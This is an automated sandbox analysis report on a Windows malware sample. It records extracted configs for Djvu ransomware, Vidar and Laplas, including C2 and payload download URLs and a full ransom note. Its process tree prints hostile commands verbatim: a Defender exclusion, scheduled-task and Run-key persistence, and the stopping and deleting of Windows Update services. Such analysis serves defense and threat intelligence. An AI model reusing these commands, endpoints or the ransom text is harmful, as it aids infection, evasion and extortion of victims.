Resubmissions

18-02-2023 23:24

230218-3dwxnsdh65 10

18-02-2023 20:01

230218-yrh6hscf7s 10

Analysis

  • max time kernel
    83s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20221111-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system
  • submitted
    18-02-2023 23:24

General

  • Target

    747eea1cbc8b8a498508807a41a4424b.exe

  • Size

    247KB

  • MD5

    747eea1cbc8b8a498508807a41a4424b

  • SHA1

    d104137508c56796482869ab7f375c54e07ef797

  • SHA256

    e98e282471580c18e1d16b4272d02128acd7ed961f9a7321b98df3b52e5b6563

  • SHA512

    aa936bcb1960b63e185def04c1f69a10922345f05dbdab7194e90940efd8283133080dfdcdd437908605cb85d8d9147cf336eb7c9b1a6bfee7ec4e1a61c77902

  • SSDEEP

    3072:bV2J63oALpySynBikVAjFWV1t3p8N7z2mQRQS9na6Sp9zl4A2tTQmW07xVUmig:pCFALpy7FsWV1xy7z2mQiotSrJktIK7

Malware Config

Extracted

Family

djvu

C2

http://jiqaz.com/lancer/get.php

Attributes
  • extension

    .hhoo

  • offline_id

    dMMXkgwQTycP13C5xwPbHDSzhx1ZxiPgIMZXewt1

  • payload_url

    http://uaery.top/dl/build2.exe

    http://jiqaz.com/files/1/build3.exe

  • ransomnote

    ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-UQkYLBSiQ4 Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: [email protected] Reserve e-mail address to contact us: [email protected] Your personal ID: 0648JOsie

rsa_pubkey.plain

Extracted

Family

vidar

Version

2.5

Botnet

19

Attributes
  • profile_id

    19

Extracted

Family

laplas

C2

http://45.159.189.105

Attributes
  • api_key

    ad75d4e2e9636ca662a337b6e798d36159f23acfc89bbe9400d0d451bd8d69fd

Signatures

  • Detected Djvu ransomware 10 IoCs
  • Detects Smokeloader packer 3 IoCs
  • Djvu Ransomware

    Ransomware which is a variant of the STOP family.

  • Laplas Clipper

    Laplas is a crypto wallet stealer with three variants written in Golang, C#, and C++.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
  • Downloads MZ/PE file
  • Stops running service(s) 3 TTPs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 6 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 23 IoCs
  • Loads dropped DLL 3 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Obfuscated with Agile.Net obfuscator 2 IoCs

    Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 4 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Uses the VBS compiler for execution 1 TTPs
  • VMProtect packed file 3 IoCs

    Detects executables packed with VMProtect commercial packer.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 5 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 4 IoCs
  • Launches sc.exe 5 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 7 IoCs
  • Checks SCSI registry key(s) 3 TTPs 9 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 13 IoCs
  • Suspicious use of AdjustPrivilegeToken 48 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2644
    • C:\Users\Admin\AppData\Local\Temp\747eea1cbc8b8a498508807a41a4424b.exe
      "C:\Users\Admin\AppData\Local\Temp\747eea1cbc8b8a498508807a41a4424b.exe"
      2⤵
      • Checks SCSI registry key(s)
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      PID:4816
    • C:\Users\Admin\AppData\Local\Temp\C8D3.exe
      C:\Users\Admin\AppData\Local\Temp\C8D3.exe
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:220
      • C:\Windows\SysWOW64\schtasks.exe
        "C:\Windows\System32\schtasks.exe" /create /tn "svcupdater" /tr "C:\Users\Admin\AppData\Roaming\Win32Sync\svcupdater.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f
        3⤵
        • Creates scheduled task(s)
        PID:2008
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 220 -s 1032
        3⤵
        • Program crash
        PID:4280
    • C:\Users\Admin\AppData\Local\Temp\C9DD.exe
      C:\Users\Admin\AppData\Local\Temp\C9DD.exe
      2⤵
      • Executes dropped EXE
      • Suspicious use of SetThreadContext
      • Suspicious use of WriteProcessMemory
      PID:3892
      • C:\Users\Admin\AppData\Local\Temp\C9DD.exe
        C:\Users\Admin\AppData\Local\Temp\C9DD.exe
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • Adds Run key to start application
        • Suspicious use of WriteProcessMemory
        PID:3376
        • C:\Windows\SysWOW64\icacls.exe
          icacls "C:\Users\Admin\AppData\Local\535ea9c3-1b86-4ab8-a800-fbe598f20896" /deny *S-1-1-0:(OI)(CI)(DE,DC)
          4⤵
          • Modifies file permissions
          PID:4896
        • C:\Users\Admin\AppData\Local\Temp\C9DD.exe
          "C:\Users\Admin\AppData\Local\Temp\C9DD.exe" --Admin IsNotAutoStart IsNotTask
          4⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • Suspicious use of WriteProcessMemory
          PID:1160
          • C:\Users\Admin\AppData\Local\Temp\C9DD.exe
            "C:\Users\Admin\AppData\Local\Temp\C9DD.exe" --Admin IsNotAutoStart IsNotTask
            5⤵
            • Checks computer location settings
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:4532
            • C:\Users\Admin\AppData\Local\caf9c215-8711-4207-a908-785c1d37a047\build2.exe
              "C:\Users\Admin\AppData\Local\caf9c215-8711-4207-a908-785c1d37a047\build2.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              PID:5052
              • C:\Users\Admin\AppData\Local\caf9c215-8711-4207-a908-785c1d37a047\build2.exe
                "C:\Users\Admin\AppData\Local\caf9c215-8711-4207-a908-785c1d37a047\build2.exe"
                7⤵
                • Checks computer location settings
                • Executes dropped EXE
                • Loads dropped DLL
                • Checks processor information in registry
                PID:176
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\caf9c215-8711-4207-a908-785c1d37a047\build2.exe" & exit
                  8⤵
                    PID:4768
                    • C:\Windows\SysWOW64\timeout.exe
                      timeout /t 6
                      9⤵
                      • Delays execution with timeout.exe
                      PID:4112
              • C:\Users\Admin\AppData\Local\caf9c215-8711-4207-a908-785c1d37a047\build3.exe
                "C:\Users\Admin\AppData\Local\caf9c215-8711-4207-a908-785c1d37a047\build3.exe"
                6⤵
                • Executes dropped EXE
                PID:4204
                • C:\Windows\SysWOW64\schtasks.exe
                  /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
                  7⤵
                  • Creates scheduled task(s)
                  PID:1988
      • C:\Users\Admin\AppData\Local\Temp\CD98.exe
        C:\Users\Admin\AppData\Local\Temp\CD98.exe
        2⤵
        • Executes dropped EXE
        • Checks SCSI registry key(s)
        • Suspicious behavior: MapViewOfSection
        PID:1808
      • C:\Users\Admin\AppData\Local\Temp\D0E4.exe
        C:\Users\Admin\AppData\Local\Temp\D0E4.exe
        2⤵
        • Executes dropped EXE
        PID:4556
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 4556 -s 452
          3⤵
          • Program crash
          PID:3516
      • C:\Users\Admin\AppData\Local\Temp\DA3C.exe
        C:\Users\Admin\AppData\Local\Temp\DA3C.exe
        2⤵
        • Checks computer location settings
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:2028
        • C:\Users\Admin\AppData\Local\Temp\llpb1133a.exe
          "C:\Users\Admin\AppData\Local\Temp\llpb1133a.exe"
          3⤵
          • Executes dropped EXE
          PID:4248
        • C:\Users\Admin\AppData\Local\Temp\liyy.exe
          "C:\Users\Admin\AppData\Local\Temp\liyy.exe"
          3⤵
          • Checks computer location settings
          • Executes dropped EXE
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:3216
          • C:\Users\Admin\AppData\Local\Temp\liyy.exe
            "C:\Users\Admin\AppData\Local\Temp\liyy.exe" -h
            4⤵
            • Executes dropped EXE
            • Suspicious use of SetWindowsHookEx
            PID:3228
        • C:\Users\Admin\AppData\Local\Temp\XandETC.exe
          "C:\Users\Admin\AppData\Local\Temp\XandETC.exe"
          3⤵
          • Suspicious use of NtCreateUserProcessOtherParentProcess
          • Executes dropped EXE
          PID:4904
      • C:\Users\Admin\AppData\Local\Temp\E5E5.exe
        C:\Users\Admin\AppData\Local\Temp\E5E5.exe
        2⤵
        • Executes dropped EXE
        PID:3352
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 3352 -s 816
          3⤵
          • Program crash
          PID:2732
      • C:\Users\Admin\AppData\Local\Temp\E9AF.exe
        C:\Users\Admin\AppData\Local\Temp\E9AF.exe
        2⤵
        • Executes dropped EXE
        • Checks SCSI registry key(s)
        • Suspicious behavior: MapViewOfSection
        PID:2160
      • C:\Users\Admin\AppData\Local\Temp\EE05.exe
        C:\Users\Admin\AppData\Local\Temp\EE05.exe
        2⤵
        • Executes dropped EXE
        PID:752
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 752 -s 452
          3⤵
          • Program crash
          PID:3324
      • C:\Users\Admin\AppData\Local\Temp\5433.exe
        C:\Users\Admin\AppData\Local\Temp\5433.exe
        2⤵
        • Executes dropped EXE
        PID:2968
        • C:\Windows\SysWOW64\rundll32.exe
          C:\Windows\system32\rundll32.exe C:\Users\Admin\AppData\Local\Temp\Ruifriwreh.dll,start
          3⤵
            PID:2228
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 2968 -s 676
            3⤵
            • Program crash
            PID:1200
        • C:\Users\Admin\AppData\Local\Temp\7170.exe
          C:\Users\Admin\AppData\Local\Temp\7170.exe
          2⤵
          • Executes dropped EXE
          PID:3584
        • C:\Users\Admin\AppData\Local\Temp\8305.exe
          C:\Users\Admin\AppData\Local\Temp\8305.exe
          2⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Checks whether UAC is enabled
          • Checks processor information in registry
          • Suspicious use of AdjustPrivilegeToken
          PID:1292
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
          2⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:1196
        • C:\Users\Admin\AppData\Local\Temp\8930.exe
          C:\Users\Admin\AppData\Local\Temp\8930.exe
          2⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          PID:888
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
            3⤵
              PID:4896
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 888 -s 288
              3⤵
              • Program crash
              PID:3344
          • C:\Users\Admin\AppData\Local\Temp\9314.exe
            C:\Users\Admin\AppData\Local\Temp\9314.exe
            2⤵
            • Executes dropped EXE
            PID:3596
          • C:\Windows\SysWOW64\explorer.exe
            C:\Windows\SysWOW64\explorer.exe
            2⤵
              PID:332
            • C:\Windows\explorer.exe
              C:\Windows\explorer.exe
              2⤵
                PID:4952
              • C:\Windows\SysWOW64\explorer.exe
                C:\Windows\SysWOW64\explorer.exe
                2⤵
                  PID:4268
                • C:\Windows\explorer.exe
                  C:\Windows\explorer.exe
                  2⤵
                    PID:3656
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wsyzqeupt#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'NoteUpdateTaskMachineQC' /tr '''C:\Program Files\Notepad\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Notepad\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'NoteUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "NoteUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Notepad\Chrome\updater.exe' }
                    2⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3636
                  • C:\Windows\System32\cmd.exe
                    C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                    2⤵
                      PID:4088
                      • C:\Windows\System32\powercfg.exe
                        powercfg /x -hibernate-timeout-ac 0
                        3⤵
                          PID:1720
                        • C:\Windows\System32\powercfg.exe
                          powercfg /x -hibernate-timeout-dc 0
                          3⤵
                            PID:1784
                          • C:\Windows\System32\powercfg.exe
                            powercfg /x -standby-timeout-ac 0
                            3⤵
                              PID:3784
                            • C:\Windows\System32\powercfg.exe
                              powercfg /x -standby-timeout-dc 0
                              3⤵
                                PID:2952
                            • C:\Windows\System32\cmd.exe
                              C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                              2⤵
                                PID:3804
                                • C:\Windows\System32\sc.exe
                                  sc stop UsoSvc
                                  3⤵
                                  • Launches sc.exe
                                  PID:2228
                                • C:\Windows\System32\sc.exe
                                  sc stop WaaSMedicSvc
                                  3⤵
                                  • Launches sc.exe
                                  PID:1200
                                • C:\Windows\System32\sc.exe
                                  sc stop wuauserv
                                  3⤵
                                  • Launches sc.exe
                                  PID:2216
                                • C:\Windows\System32\sc.exe
                                  sc stop bits
                                  3⤵
                                  • Launches sc.exe
                                  PID:1660
                                • C:\Windows\System32\sc.exe
                                  sc stop dosvc
                                  3⤵
                                  • Launches sc.exe
                                  PID:5024
                                • C:\Windows\System32\reg.exe
                                  reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
                                  3⤵
                                    PID:3152
                                  • C:\Windows\System32\reg.exe
                                    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
                                    3⤵
                                      PID:4980
                                    • C:\Windows\System32\reg.exe
                                      reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
                                      3⤵
                                        PID:3472
                                      • C:\Windows\System32\reg.exe
                                        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
                                        3⤵
                                          PID:4572
                                        • C:\Windows\System32\reg.exe
                                          reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                                          3⤵
                                            PID:2472
                                        • C:\Windows\SysWOW64\explorer.exe
                                          C:\Windows\SysWOW64\explorer.exe
                                          2⤵
                                            PID:5084
                                          • C:\Windows\SysWOW64\explorer.exe
                                            C:\Windows\SysWOW64\explorer.exe
                                            2⤵
                                              PID:4056
                                            • C:\Windows\SysWOW64\explorer.exe
                                              C:\Windows\SysWOW64\explorer.exe
                                              2⤵
                                                PID:4536
                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#iqegjinl#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "NoteUpdateTaskMachineQC" } Else { "C:\Program Files\Notepad\Chrome\updater.exe" }
                                                2⤵
                                                  PID:1608
                                                  • C:\Windows\system32\schtasks.exe
                                                    "C:\Windows\system32\schtasks.exe" /run /tn NoteUpdateTaskMachineQC
                                                    3⤵
                                                      PID:1028
                                                  • C:\Windows\explorer.exe
                                                    C:\Windows\explorer.exe
                                                    2⤵
                                                      PID:1076
                                                    • C:\Windows\SysWOW64\explorer.exe
                                                      C:\Windows\SysWOW64\explorer.exe
                                                      2⤵
                                                        PID:832
                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                                        2⤵
                                                          PID:2368
                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 4556 -ip 4556
                                                        1⤵
                                                          PID:4300
                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 3352 -ip 3352
                                                          1⤵
                                                            PID:1660
                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 752 -ip 752
                                                            1⤵
                                                              PID:1788
                                                            • C:\Windows\system32\rundll32.exe
                                                              rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open
                                                              1⤵
                                                              • Process spawned unexpected child process
                                                              PID:3460
                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open
                                                                2⤵
                                                                • Loads dropped DLL
                                                                PID:3976
                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 3976 -s 600
                                                                  3⤵
                                                                  • Program crash
                                                                  PID:4900
                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 3976 -ip 3976
                                                              1⤵
                                                                PID:4728
                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 220 -ip 220
                                                                1⤵
                                                                  PID:1096
                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 888 -ip 888
                                                                  1⤵
                                                                    PID:4376
                                                                  • C:\Windows\system32\msiexec.exe
                                                                    C:\Windows\system32\msiexec.exe /V
                                                                    1⤵
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:2816
                                                                  • C:\Users\Admin\AppData\Roaming\Win32Sync\svcupdater.exe
                                                                    C:\Users\Admin\AppData\Roaming\Win32Sync\svcupdater.exe
                                                                    1⤵
                                                                      PID:100
                                                                    • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                      C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                      1⤵
                                                                        PID:1460
                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                          /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
                                                                          2⤵
                                                                          • Creates scheduled task(s)
                                                                          PID:644
                                                                      • C:\Program Files\Notepad\Chrome\updater.exe
                                                                        "C:\Program Files\Notepad\Chrome\updater.exe"
                                                                        1⤵
                                                                          PID:4380
                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 2968 -ip 2968
                                                                          1⤵
                                                                            PID:2172

                                                                          Network

                                                                          MITRE ATT&CK Matrix ATT&CK v6

                                                                          Execution

                                                                          Scripting

                                                                          1
                                                                          T1064

                                                                          Scheduled Task

                                                                          1
                                                                          T1053

                                                                          Persistence

                                                                          Modify Existing Service

                                                                          1
                                                                          T1031

                                                                          Registry Run Keys / Startup Folder

                                                                          1
                                                                          T1060

                                                                          Scheduled Task

                                                                          1
                                                                          T1053

                                                                          Privilege Escalation

                                                                          Scheduled Task

                                                                          1
                                                                          T1053

                                                                          Defense Evasion

                                                                          Virtualization/Sandbox Evasion

                                                                          1
                                                                          T1497

                                                                          Impair Defenses

                                                                          1
                                                                          T1562

                                                                          File Permissions Modification

                                                                          1
                                                                          T1222

                                                                          Scripting

                                                                          1
                                                                          T1064

                                                                          Modify Registry

                                                                          1
                                                                          T1112

                                                                          Credential Access

                                                                          Credentials in Files

                                                                          3
                                                                          T1081

                                                                          Discovery

                                                                          Query Registry

                                                                          6
                                                                          T1012

                                                                          Virtualization/Sandbox Evasion

                                                                          1
                                                                          T1497

                                                                          System Information Discovery

                                                                          6
                                                                          T1082

                                                                          Peripheral Device Discovery

                                                                          1
                                                                          T1120

                                                                          Collection

                                                                          Data from Local System

                                                                          3
                                                                          T1005

                                                                          Command and Control

                                                                          Web Service

                                                                          1
                                                                          T1102

                                                                          Impact

                                                                          Service Stop

                                                                          1
                                                                          T1489

                                                                          Replay Monitor

                                                                          Loading Replay Monitor...

                                                                          Downloads

                                                                          • C:\Program Files\Notepad\Chrome\updater.exe
                                                                            Filesize

                                                                            3.7MB

                                                                            MD5

                                                                            3006b49f3a30a80bb85074c279acc7df

                                                                            SHA1

                                                                            728a7a867d13ad0034c29283939d94f0df6c19df

                                                                            SHA256

                                                                            f283b4c0ad4a902e1cb64201742ca4c5118f275e7b911a7dafda1ef01b825280

                                                                            SHA512

                                                                            e8fc5791892d7f08af5a33462a11d39d29b5e86a62cbf135b12e71f2fcaaa48d40d5e3238f64e17a2f126bcfb9d70553a02d30dc60a89f1089b2c1e7465105dd

                                                                          • C:\ProgramData\mozglue.dll
                                                                            Filesize

                                                                            593KB

                                                                            MD5

                                                                            c8fd9be83bc728cc04beffafc2907fe9

                                                                            SHA1

                                                                            95ab9f701e0024cedfbd312bcfe4e726744c4f2e

                                                                            SHA256

                                                                            ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

                                                                            SHA512

                                                                            fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

                                                                          • C:\ProgramData\nss3.dll
                                                                            Filesize

                                                                            2.0MB

                                                                            MD5

                                                                            1cc453cdf74f31e4d913ff9c10acdde2

                                                                            SHA1

                                                                            6e85eae544d6e965f15fa5c39700fa7202f3aafe

                                                                            SHA256

                                                                            ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5

                                                                            SHA512

                                                                            dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

                                                                          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D
                                                                            Filesize

                                                                            2KB

                                                                            MD5

                                                                            e825419f5d91cbb7dd2c1407c2ae4c08

                                                                            SHA1

                                                                            daca95b9bffaff1aacb09d09292a41c5e98f0d12

                                                                            SHA256

                                                                            01a7d3b0ef49c660185536f53cfa2744c7784aef0981df4fd03ae06770b25376

                                                                            SHA512

                                                                            e4c0b3dea86821de18a10f43dac1263cf917075b620cd4f6ca22331dec27ca0c89b57145e33de8f502e09c1bcfaa400d27cb601f315b1a8b4c851f15064fd514

                                                                          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
                                                                            Filesize

                                                                            1KB

                                                                            MD5

                                                                            0e8f1fb71254974e1d528b62e7b02e8b

                                                                            SHA1

                                                                            2275bdfb4779b15a886d9558ee3e0ce97112ddee

                                                                            SHA256

                                                                            f5e027fd76267c7668098a78724a82ca20ffb6818fc4e5b6eb9669866f32800c

                                                                            SHA512

                                                                            f084ae94658a9a8db6da8437cd8ad913e9820ff6f05f974ca165ee7af98a0cbf32e87fde1e263c9a7ec9d7877de44ee0ab1dd22269135a03a922d7dcc6473304

                                                                          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D
                                                                            Filesize

                                                                            488B

                                                                            MD5

                                                                            92c2bdc53f4cdb7df3e82941fbee8a73

                                                                            SHA1

                                                                            9428c7618820c081b4a0857e885fb0a49867ef19

                                                                            SHA256

                                                                            65300962f4aafaad804540999832dfe2865749129b3b68c8213f12bf1c44449f

                                                                            SHA512

                                                                            ee16598dea98bb3175b4e0df44dc96a963747a80c048ad943628c9b91303e3da5e0d361feebfd04a320da11c4ce3cc0695aeab9391b014296af25825dac30434

                                                                          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
                                                                            Filesize

                                                                            482B

                                                                            MD5

                                                                            9fa9cf325a0e7f23b333e8875a9ab40b

                                                                            SHA1

                                                                            f2fe68abd7275cc68e757ddc6179815297aa5ef7

                                                                            SHA256

                                                                            413da7b5c3a8fb18a8abfb1839e198b5b227172d97d60ce81f353991a1efcfdf

                                                                            SHA512

                                                                            b9fb60bc5e52d2bf1fd3df83ea27913472a7a5ed662f4e266bac6dac7459e48339c493e377089889835db8183cc2fa6fcc08bdb7f33e7fc2dfcf1a0f2981e558

                                                                          • C:\Users\Admin\AppData\Local\535ea9c3-1b86-4ab8-a800-fbe598f20896\C9DD.exe
                                                                            Filesize

                                                                            749KB

                                                                            MD5

                                                                            087f75c142ef66212e79e99f26abf68a

                                                                            SHA1

                                                                            44999a5c4ad01c3cc48868a49c81ef79d183d429

                                                                            SHA256

                                                                            571d2d43b09ac4c8183bc452988e271691402d4e9a14775f7483bb645c4b702b

                                                                            SHA512

                                                                            3f730e93b41b3b6ac061a120ed9e54ef5b3591e766eafcb375b3c3890a1d04367dc59f6709b9c0c96d00f0e686ae921425f600f8c0f692fe15530d264ee8862a

                                                                          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                                                                            Filesize

                                                                            2KB

                                                                            MD5

                                                                            d85ba6ff808d9e5444a4b369f5bc2730

                                                                            SHA1

                                                                            31aa9d96590fff6981b315e0b391b575e4c0804a

                                                                            SHA256

                                                                            84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                                                                            SHA512

